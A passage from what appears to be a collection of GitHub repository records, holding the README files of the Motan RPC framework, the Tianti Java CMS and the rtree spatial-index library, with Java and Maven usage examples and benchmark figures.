public void post() {
RxBus.get().post(this);
}
public void postByTag() {
RxBus.get().post(Constants.EventType.TAG_STORY, this);
}
...
}
```
**That is all done!**
Lint
--------
Features
--------
* JUnit test
* Docs
History
--------
Here is the [CHANGELOG](CHANGELOG.md).
FAQ
--------
**Q:** How to do pull requests?
**A:** Ensure good code quality and consistent formatting.
License
--------
Copyright 2015 HwangJR, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
weibocom/motan,master,5872,1780,2016-04-20T10:56:17Z,4340,356,A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.,,"# Motan
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE)
[![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan)
[![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan)
[![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io)
[![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking)
# Overview
Motan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.
Related projects in Motan ecosystem:
- [Motan-go](https://github.com/weibocom/motan-go) is the Golang implementation.
- [Motan-PHP](https://github.com/weibocom/motan-php) is a PHP client that can interact with a Motan server directly or through a Motan-go agent.
- [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua (LuaJIT) implementation based on [Openresty](http://openresty.org).
# Features
- Create distributed services without writing extra code.
- Provides cluster support and integrates with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper].
- Supports advanced scheduling features like weighted load-balancing, scheduling across IDCs, etc.
- Optimized for high-load scenarios, providing high availability in production environments.
- Supports both synchronous and asynchronous calls.
- Supports cross-language interaction with Golang, PHP, Lua (LuaJIT), etc.
# Quick Start
The quick start gives a very basic example of running a client and a server on the same machine. For detailed information about using and developing Motan, please jump to [Documents](#documents).
> The minimum requirements to run the quick start are:
>
> - JDK 1.8 or above
> - A java-based project management software like [Maven][maven] or [Gradle][gradle]
## Synchronous calls
1. Add dependencies to pom.
```xml
<properties>
    <motan.version>1.1.12</motan.version>
</properties>
<dependencies>
    <dependency>
        <groupId>com.weibo</groupId>
        <artifactId>motan-core</artifactId>
        <version>${motan.version}</version>
    </dependency>
    <dependency>
        <groupId>com.weibo</groupId>
        <artifactId>motan-transport-netty</artifactId>
        <version>${motan.version}</version>
    </dependency>
    <dependency>
        <groupId>com.weibo</groupId>
        <artifactId>motan-springsupport</artifactId>
        <version>${motan.version}</version>
    </dependency>
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-context</artifactId>
        <version>4.2.4.RELEASE</version>
    </dependency>
</dependencies>
```
2. Create an interface for both service provider and consumer.
`src/main/java/quickstart/FooService.java`
```java
package quickstart;
public interface FooService {
public String hello(String name);
}
```
3. Write an implementation, create and start RPC Server.
`src/main/java/quickstart/FooServiceImpl.java`
```java
package quickstart;
public class FooServiceImpl implements FooService {
public String hello(String name) {
System.out.println(name + "" invoked rpc service"");
return ""hello "" + name;
}
}
```
`src/main/resources/motan_server.xml`
```xml
```
`src/main/java/quickstart/Server.java`
```java
package quickstart;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Server {
public static void main(String[] args) throws InterruptedException {
ApplicationContext applicationContext = new ClassPathXmlApplicationContext(""classpath:motan_server.xml"");
System.out.println(""server start..."");
}
}
```
Executing the main function in `Server` will start a Motan server listening on port 8002.
4. Create and start RPC Client.
`src/main/resources/motan_client.xml`
```xml
```
`src/main/java/quickstart/Client.java`
```java
package quickstart;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Client {
public static void main(String[] args) throws InterruptedException {
ApplicationContext ctx = new ClassPathXmlApplicationContext(""classpath:motan_client.xml"");
FooService service = (FooService) ctx.getBean(""remoteService"");
System.out.println(service.hello(""motan""));
}
}
```
Executing the main function in `Client` will invoke the remote service and print the response.
## Asynchronous calls
1. Based on the `Synchronous calls` example, add `@MotanAsync` annotation to interface `FooService`.
```java
package quickstart;
import com.weibo.api.motan.transport.async.MotanAsync;
@MotanAsync
public interface FooService {
public String hello(String name);
}
```
2. Include the plugin into the POM file to set `target/generated-sources/annotations/` as source folder.
```xml
<plugin>
    <groupId>org.codehaus.mojo</groupId>
    <artifactId>build-helper-maven-plugin</artifactId>
    <version>1.10</version>
    <executions>
        <execution>
            <phase>generate-sources</phase>
            <goals>
                <goal>add-source</goal>
            </goals>
            <configuration>
                <sources>
                    <source>${project.build.directory}/generated-sources/annotations</source>
                </sources>
            </configuration>
        </execution>
    </executions>
</plugin>
```
3. Modify the attribute `interface` of referer in `motan_client.xml` from `FooService` to `FooServiceAsync`.
```xml
```
4. Start asynchronous calls.
```java
public static void main(String[] args) {
ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {""classpath:motan_client.xml""});
FooServiceAsync service = (FooServiceAsync) ctx.getBean(""remoteService"");
// sync call
System.out.println(service.hello(""motan""));
// async call
ResponseFuture future = service.helloAsync(""motan async "");
System.out.println(future.getValue());
// multi call
ResponseFuture future1 = service.helloAsync(""motan async multi-1"");
ResponseFuture future2 = service.helloAsync(""motan async multi-2"");
System.out.println(future1.getValue() + "", "" + future2.getValue());
// async with listener
FutureListener listener = new FutureListener() {
@Override
public void operationComplete(Future future) throws Exception {
System.out.println(""async call ""
+ (future.isSuccess() ? ""success! value:"" + future.getValue() : ""fail! exception:""
+ future.getException().getMessage()));
}
};
ResponseFuture future3 = service.helloAsync(""motan async multi-1"");
ResponseFuture future4 = service.helloAsync(""motan async multi-2"");
future3.addListener(listener);
future4.addListener(listener);
}
```
# Documents
- [Wiki](https://github.com/weibocom/motan/wiki)
- [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview)
# Contributors
- maijunsheng([@maijunsheng](https://github.com/maijunsheng))
- fishermen([@hustfisher](https://github.com/hustfisher))
- TangFulin([@tangfl](https://github.com/tangfl))
- bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng))
- jacawang([@jacawang](https://github.com/jacawang))
- zenglingshu([@zenglingshu](https://github.com/zenglingshu))
- Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos))
- tangyang([@tangyang](https://github.com/tangyang))
- olivererwang([@olivererwang](https://github.com/olivererwang))
- jackael([@jackael9856](https://github.com/jackael9856))
- Ray([@rayzhang0603](https://github.com/rayzhang0603))
- r2dx([@half-dead](https://github.com/half-dead))
- Jake Zhang([sunnights](https://github.com/sunnights))
- axb([@qdaxb](https://github.com/qdaxb))
- wenqisun([@wenqisun](https://github.com/wenqisun))
- fingki([@fingki](https://github.com/fingki))
- 午夜([@sumory](https://github.com/sumory))
- guanly([@guanly](https://github.com/guanly))
- Di Tang([@tangdi](https://github.com/tangdi))
- 肥佬大([@feilaoda](https://github.com/feilaoda))
- 小马哥([@andot](https://github.com/andot))
- wu-sheng([@wu-sheng](https://github.com/wu-sheng)) _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_
- Jin Zhang([@lowzj](https://github.com/lowzj))
- xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang))
- 东方上人([@dongfangshangren](https://github.com/dongfangshangren))
- Voyager3([@xxxxzr](https://github.com/xxxxzr))
- yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009))
- Michael Yang([@yangfuhai](https://github.com/yangfuhai))
- Panying([@anylain](https://github.com/anylain))
# License
Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0).
[maven]:https://maven.apache.org
[gradle]:http://gradle.org
[consul]:http://www.consul.io
[zookeeper]:http://zookeeper.apache.org
"
xujeff/tianti,master,1097,590,2017-02-08T08:21:02Z,29124,29,java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案,用户可以结合自身业务进行相应扩展,同时提供了针对dao、service等的代码生成工具。技术选型:Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。,cms hibernate java layer mysql shiro spring-data-jpa spring-mvc,"# 天梯(tianti)
[Tianti](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487) / [tianti-tool](https://github.com/xujeff/tianti-tool) introduction:
1. Tianti is a free, lightweight CMS system written in Java that currently provides an end-to-end solution from back-office management to front-end presentation.
2. Users can build a CMS site with the default look without writing a single line of code.
3. The front-end pages are responsive and support both PC and H5 (mobile), implemented with a front/back-end separation. The back office supports the Tianti Blue and Tianti Red skins.
4. The project is clearly layered technically, so users can extend it for their own business modules; secondary development is straightforward.
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png)
Technical architecture:
1. Technology stack:
Back end
· Core framework: Spring Framework 4.2.5.RELEASE
· Security framework: Apache Shiro 1.3.2
· View framework: Spring MVC 4.2.5.RELEASE
· Database connection pool: Tomcat JDBC
· Cache framework: Ehcache
· ORM framework: Spring Data JPA, Hibernate 4.3.5.Final
· Logging: SLF4J 1.7.21, Log4j
· Rich text editor: ueditor
· Utilities: Apache Commons, Jackson 2.8.5, POI 3.15
· View layer: JSP
· Database: MySQL, Oracle and other relational databases
Front end
· DOM: jQuery
· Pagination: jquery.pagination
· UI management: common
· UI integration: uiExtend
· Scrollbar: jquery.nicescroll.min.js
· Charts: highcharts
· 3D charts: highcharts-more
· Carousel: jquery-swipe
· Form submission: jquery.form
· File upload: jquery.uploadify
· Form validation: jquery.validator
· Tree view: jquery.ztree
· HTML template engine: template
2. Project structure:
2.1 tianti-common: base abstractions for the system, including the entity, dao and service layers;
2.2 tianti-org: user and permission module services;
2.3 tianti-cms: content/news module services;
2.4 tianti-module-admin: the Tianti back-office web application;
2.5 tianti-module-interface: the Tianti API project;
2.6 tianti-module-gateway: the responsive front-end project (a static project that calls tianti-module-interface for data);
Front-end project overview:
PC:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)
H5:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)
Back-office project overview:
Tianti login page:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)
Tianti Blue skin (default):
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png)
Tianti Red skin:
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png)
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png)
"
davidmoten/rtree,master,1071,211,2014-08-26T12:29:14Z,1812,34,Immutable in-memory R-tree and R*-tree implementations in Java with reactive api,,"rtree
=========
[![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)
[![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree)
In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results.
Status: *released to Maven Central*
Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2).
An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index.
This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing).
The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the
required leaf node then recursion back up to replace the parent nodes up to the root. The guts of
it is in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java).
[Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a
bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing
the node and child index of the path nodes came to the rescue here and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately java doesn't support tail recursion!).
Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html).
Features
------------
* immutable R-tree suitable for concurrency
* Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E))
* R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf))
* Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java)
* 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)).
* search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html)
* search is cancelled by unsubscription
* search is ```O(log(n))``` on average
* insert, delete are ```O(n)``` worst case
* all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency
* balanced delete
* uses structural sharing
* supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure)
* JMH benchmarks
* visualizer included
* serialization using [FlatBuffers](http://github.com/google/flatbuffers)
* high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html)
* R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67Ghz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second.
* requires java 1.6 or later
Number of points = 1000, max children per node 8:
| Quadratic split | R*-tree split | STR bulk loaded |
| :-------------: | :-----------: | :-----------: |
| | | |
Notice that there is little overlap in the R*-tree split compared to the
Quadratic split. This should provide better search performance (and in general benchmarks show this).
STR bulk loaded R-tree has a bit more overlap than R*-tree, which affects the search performance at some extent.
Getting started
----------------
Add this maven dependency to your pom.xml:
```xml
<dependency>
  <groupId>com.github.davidmoten</groupId>
  <artifactId>rtree</artifactId>
  <version>VERSION_HERE</version>
</dependency>
```
### Instantiate an R-Tree
Use the static builder methods on the ```RTree``` class:
```java
// create an R-tree using Quadratic split with max
// children per node 4, min children 2 (the threshold
// at which members are redistributed)
RTree tree = RTree.create();
```
You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*:
```java
RTree tree = RTree.minChildren(3).maxChildren(6).create();
```
### Geometries
The following geometries are supported for insertion in an RTree:
* `Rectangle`
* `Point`
* `Circle`
* `Line`
### Generic typing
If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety:
```java
RTree<String, Point> tree = RTree.create();
```
### R*-tree
If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area):
```
RTree tree = RTree.star().maxChildren(6).create();
```
See benchmarks below for some of the performance differences.
### Add items to the R-tree
When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or
extension of the item. The ``Geometries`` builder provides these factory methods:
* ```Geometries.rectangle```
* ```Geometries.circle```
* ```Geometries.point```
* ```Geometries.line``` (requires *jts-core* dependency)
To add an item to an R-tree:
```java
RTree tree = RTree.create();
tree = tree.add(item, Geometries.point(10,20));
```
or
```java
tree = tree.add(Entries.entry(item, Geometries.point(10,20)));
```
*Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```,
it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```!
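For instance, a minimal sketch (reusing `Geometries.point` from above) of the wrong and the right way to use `add`:
```java
RTree<String, Point> tree = RTree.create();
// WRONG: the returned tree is discarded, so 'tree' still has no entries
tree.add(""DAVE"", Geometries.point(10, 20));
// RIGHT: keep the returned tree, which contains the new entry
tree = tree.add(""DAVE"", Geometries.point(10, 20));
```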
### Remove an item in the R-tree
To remove an item from an R-tree, you need to match the item and its geometry:
```java
tree = tree.delete(item, Geometries.point(10,20));
```
or
```java
tree = tree.delete(entry);
```
*Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```,
it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```!
### Geospatial geometries (lats and longs)
To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s:
```java
Point point = Geometries.pointGeographic(lon, lat);
Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2);
```
Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude.
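Purely as an illustration of that rule (this is a standalone sketch, not the library's internal code):
```java
// Illustrative only: the longitude normalization described above.
final class GeoNormalize {
    // normalize a longitude into the interval [-180, 180)
    static double longitude(double lon) {
        return ((lon + 180) % 360 + 360) % 360 - 180;
    }

    // for geographic rectangles: if the rightmost longitude is less than the
    // leftmost one after normalization, add 360 so the rectangle spans the
    // 180/-180 boundary
    static double rightLongitude(double leftLon, double rightLon) {
        return rightLon < leftLon ? rightLon + 360 : rightLon;
    }
}
```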
### Custom geometries
You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). An implementation of ```Geometry``` needs to specify methods to:
* check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance)
* provide a minimum bounding rectangle
* implement ```equals``` and ```hashCode``` for consistent equality checking
* measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```.
For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties:
* ```distance(r) >= 0 for all rectangles r```
* ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)```
* ```distance(r) = 0 if and only if the geometry intersects the rectangle r```
### Searching
The advantage of an R-tree is the ability to search for items in a region reasonably quickly.
On average search is ```O(log(n))``` but worst case is ```O(n)```.
Search methods return ```Observable``` sequences:
```java
Observable<Entry<T, Geometry>> results =
tree.search(Geometries.rectangle(0,0,2,2));
```
or search for items within a distance from the given geometry:
```java
Observable<Entry<T, Geometry>> results =
tree.search(Geometries.rectangle(0,0,2,2),5.0);
```
To return all entries from an R-tree:
```java
Observable<Entry<T, Geometry>> results = tree.entries();
```
Search with a custom geometry
-----------------------------------
Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree``` for points inside the polygon. This is how you do it:
```java
RTree<String, Point> tree = RTree.create();
Func2<Point, Polygon, Boolean> pointInPolygon = ...
Polygon polygon = ...
...
entries = tree.search(polygon, pointInPolygon);
```
The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for) .
Search with a custom geometry and maxDistance
--------------------------------------------------
As per the example above to do a proximity search you need to specify how to calculate distance between the geometry you are searching and the entry geometries:
```java
RTree<String, Point> tree = RTree.create();
Func2<Point, Polygon, Double> distancePointToPolygon = ...
Polygon polygon = ...
...
entries = tree.search(polygon, 10, distancePointToPolygon);
```
Example
--------------
```java
import com.github.davidmoten.rtree.RTree;
import static com.github.davidmoten.rtree.geometry.Geometries.*;
RTree<String, Point> tree = RTree.maxChildren(5).create();
tree = tree.add(""DAVE"", point(10, 20))
.add(""FRED"", point(12, 25))
.add(""MARY"", point(97, 125));
Observable<Entry<String, Point>> entries =
tree.search(Geometries.rectangle(8, 15, 30, 35));
```
Searching by distance on lat longs
------------------------------------
See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central.
Another lat long example searching geo circles
------------------------------------------------
See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance).
What do I do with the Observable thing?
-------------------------------------------
Very useful, see [RxJava](http://github.com/ReactiveX/RxJava).
As an example, suppose you want to filter the search results then apply a function on each and reduce to some best answer:
```java
import rx.Observable;
import rx.functions.*;
import rx.schedulers.Schedulers;
Character result =
tree.search(Geometries.rectangle(8, 15, 30, 35))
// filter for names alphabetically less than M
.filter(entry -> entry.value().compareTo(""M"") < 0)
// get the first character of the name
.map(entry -> entry.value().charAt(0))
// reduce to the first character alphabetically
.reduce((x,y) -> x <= y ? x : y)
// subscribe to the stream and block for the result
.toBlocking().single();
System.out.println(result);
```
output:
```
D
```
How to configure the R-tree for best performance
--------------------------------------------------
Check out the benchmarks below and refer to [another benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults. General rules based on the benchmarks:
* for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4)
* for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default)
* use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets
Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics.
What about memory use?
------------------------
To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). Here are examples:
```java
// create geometry using double precision
Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0);
// create geometry using single precision
Rectangle r = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f);
```
The same creation methods exist for `Circle` and `Line`.
How do I just get an Iterable back from a search?
---------------------------------------------------------
If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search:
```java
Iterable it = tree.search(Geometries.point(4,5))
.toBlocking().toIterable();
```
Backpressure
-----------------
The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below.
Visualizer
--------------
To visualize the R-tree in a PNG file of size 600 by 600 pixels just call:
```java
tree.visualize(600,600)
.save(""target/mytree.png"");
```
The result is like the images in the Features section above.
Visualize as text
--------------------
The ```RTree.asString()``` method returns output like this:
```
mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0]
mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0]
entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]]
entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]]
entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]]
mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0]
entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]]
entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]]
```
Serialization
------------------
Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree.
The greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines.
As of 5 March 2016, indicative RTree metrics using flatbuffers data structure are:
* one third the memory use with log(N) object creations per search
* one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream)
* one tenth the speed without backpressure
Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies:
```xml
<dependency>
  <groupId>com.google.flatbuffers</groupId>
  <artifactId>flatbuffers-java</artifactId>
  <version>2.0.3</version>
  <optional>true</optional>
</dependency>
```
## Serialization example
Write an `RTree` to an `OutputStream`:
```java
RTree tree = ...;
OutputStream os = ...;
Serializer serializer =
Serializers.flatBuffers().utf8();
serializer.write(tree, os);
```
Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure:
```java
RTree tree =
serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY);
```
Read an `RTree` from an `InputStream` into a default structure:
```java
RTree tree =
serializer.read(is, lengthBytes, InternalStructure.DEFAULT);
```
Dependencies
---------------------
As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput as the guava class.
How to build
----------------
```
git clone https://github.com/davidmoten/rtree.git
cd rtree
mvn clean install
```
How to run benchmarks
--------------------------
Benchmarks are provided by
```
mvn clean install -Pbenchmark
```
Coverity scan
----------------
This codebase is scanned by Coverity scan whenever the branch `coverity_scan` is updated.
For the project committers if a coverity scan is desired just do this:
```bash
git checkout coverity_scan
git pull origin master
git push origin coverity_scan
```
### Notes
The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case.
### Results
These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7:
```
Benchmark Mode Cnt Score Error Units
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s
defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s
defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s
defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s
defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s
defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s
defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s
defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s
